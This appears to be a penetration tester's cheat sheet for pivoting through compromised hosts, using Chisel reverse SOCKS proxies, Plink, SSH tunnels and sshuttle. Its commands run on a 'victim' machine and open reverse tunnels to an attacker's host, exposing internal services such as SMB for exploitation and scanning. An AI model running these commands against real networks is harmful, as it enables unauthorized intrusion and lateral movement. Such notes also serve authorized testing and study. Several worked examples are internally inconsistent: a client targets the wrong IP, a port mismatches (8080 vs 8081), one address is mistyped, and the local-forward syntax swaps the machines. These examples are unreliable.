Port Forwarding

Chisel - Reverse SOCKS proxy

Attacking machine: ./chisel server -p LISTEN_PORT --reverse &
Compromised machine: ./chisel client ATTACKING_IP:LISTEN_PORT R:socks &

Chisel - Forward SOCKS proxy

Attacking machine: ./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks
Compromised machine: ./chisel server -p LISTEN_PORT --socks5

Chisel - Remote port forward

Attacking machine: ./chisel server -p LISTEN_PORT --reverse &
Compromised machine: ./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &

Chisel - Local port forward

Attacking machine: ./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT
Compromised machine: ./chisel server -p LISTEN_PORT

Sshuttle proxy

Attacking machine: sshuttle -r username@address subnet

Sshuttle proxy with command execution

Attacking machine: sshuttle -r user@address --ssh-cmd "ssh -i KEYFILE" SUBNET

Sshuttle proxy if compromised host is in the same subnet we are trying to gain access to

Attacking machine: sshuttle -r user@172.16.0.5 172.16.0.0/24 -x 172.16.0.5

SSH Tunneling

ssh -N -L localhost:8888:localhost:80 root@192.168.2.3
Serves the website running locally on port 80 on 192.168.2.3 to localhost:8888 on our machine.
192.168.2.3 machine needs to have SSH port open. 

SSH Proxy Tunnel

ssh -L localhost:8888:192.168.2.10:80 root@192.168.2.3
Serves the website running INTERNALLY on port 80 on 192.168.2.10 to localhost:8888.
In this case 192.168.2.3 acts as a proxy server. 

SSH Reverse Tunnel

ssh -R localhost:8888:192.168.2.10:80 root@172.16.2.4
Serves the website running internally on 192.168.2.10:80 to localhost:8888.
In this case 172.16.2.4 is the public IP. 

#Used when we need to run an exploit on Kali but vulnerable program is listening on an internal port
#We need to forward Kali Port to internal port on Windows
#Can be used with winexe when 445 is listening internally

PLINK
#Run the following command
.\plink.exe root@10.11.15.38 -R <kaliPORT>:127.0.0.1:<victimPORT>
.\plink.exe root@10.11.15.38 -R 445:127.0.0.1:445

CHISEL
#Run this on Kali machine
./chisel_1.5.2_linux_amd64 server -p 444 --reverse
#Run this on victim machine
chisel.exe client <kaliIP>:444 R:445:127.0.0.1:445

#Run this on Windows (attacking machine):
.\chisel.exe server -p 9001 --reverse
#Run this on victim machine on which the application is listening internally. Suppose the
application is running on port 80 on the target machine.
./chisel client <attackingIP>:<portMentionedInServerCommand> R:<portOnWhichAttackerWillConnect>:localhost:<internallyListeningPort>
#Once successful, connect to the port with netcat from attacking machine.
nc localhost <portOnWhichAttackerWillConnect>
Example:
Machine A - 192.168.2.2
Machine B - 192.168.2.3
Application running on port 80 on Machine B.
Run the following on attacking machine A:
./chisel server -p 8000 --reverse
Run this on the target machine
chisel client 192.168.2.3:8000 R:8080:127.0.0.1:80
Once successful, connect to the victim machine using browser or netcat:
nc localhost 8081 

Local Port Forwarding:
When our attacking machine can connect to an intermediate machine, and that intermediate machine
connect to a final machine which has an application runnning on some port, we can use
local port forwarding in this case to allow our attacking machine to connect to the final destination
machine. 
Suppose there are 3 machines:
1. Attacking machine: A (or your current machine) - 192.168.2.2
2. A final destination machine where you want to reach: B - 192.168.2.3
3. A proxy or an intermediate machine: C - 192.168.2.4
We can implement a local port forward in this case using SSH.
On attacking machine run the following command:
ssh -L <localhost>:<localport on which traffic will arrive>:<IP of C>:<Port of C> <user>@<IP of B>
Example: 
Imagine a webserver is running on the final destination machine on port 80. And there is user named john on proxy machine.
ssh -L 127.0.0.1:80:192.168.2.4:80 john@192.68.2.3
You will be connected to the proxy machine using SSH when the command is run. 
Run the netstat -ano command and check whether the attacking machine in listening on port 80 internally on 127.0.0.1
Once successful, you can connect to port 80 locally to access the website hosted on the final destination webserver using:
firefox 127.0.0.1
Alternative command: (imagine a user named alex is on machine C)
ssh -L <localport on which traffic will arrive>:<IP of C>:<Port of C> <user>@<IP of C>
ssh -L 8080:192.168.2.4:80 alex@192.168.2.4
Once successful, you can connect to port 8080 locally to access the website hosted on the final destination webserver using:
firefox 127.0.0.1:8080

Remote Port Forwarding:
Remote port forwarding can be used in the same situation. However, in this case, instead
of establishing an SSH connection from the attacking machine, we setup it up on the 
intermediate machine. Using the same example as above:
On the intermediate machine, run the following command:
ssh -R 127.0.0.1:80:192.168.2.4:80 root@192.168.2.2
Once this command is run, the intermediate machine connects to the attacking machine.
Run the netstat -ano command and check whether the attacking machine in listening on port 80 internally on 127.0.0.1
Once successful, you can connect to port 80 locally to access the website hosted on the final destination webserver using:
firefox 127.0.0.1

Using SShuttle:
Machine A (attacking machine) has 1 IP: 192.168.2.2
Machine B (middle machine) has 2 IPs: 192.168.2.3 and 192.168.3.3
Machine C (final machine) has 1 IP: 192.168.3.4
There is a website running on port 80 on the final machine however we cannot directly access
that website as the attacking machine and the final machine are not on the same network.
We can use SShuttle for this.
On machine A, run the following command:
sshuttle -r <user>@<IP of B> <2nd subnet which is only present on machine B and C>
Example:
sshuttle -r john@192.168.2.3 192.168.3.0/24
Once successful, we can access the website running on the final machine using our attacking
machine on 192.168.3.4
We can even perform nmap scan using that IP now.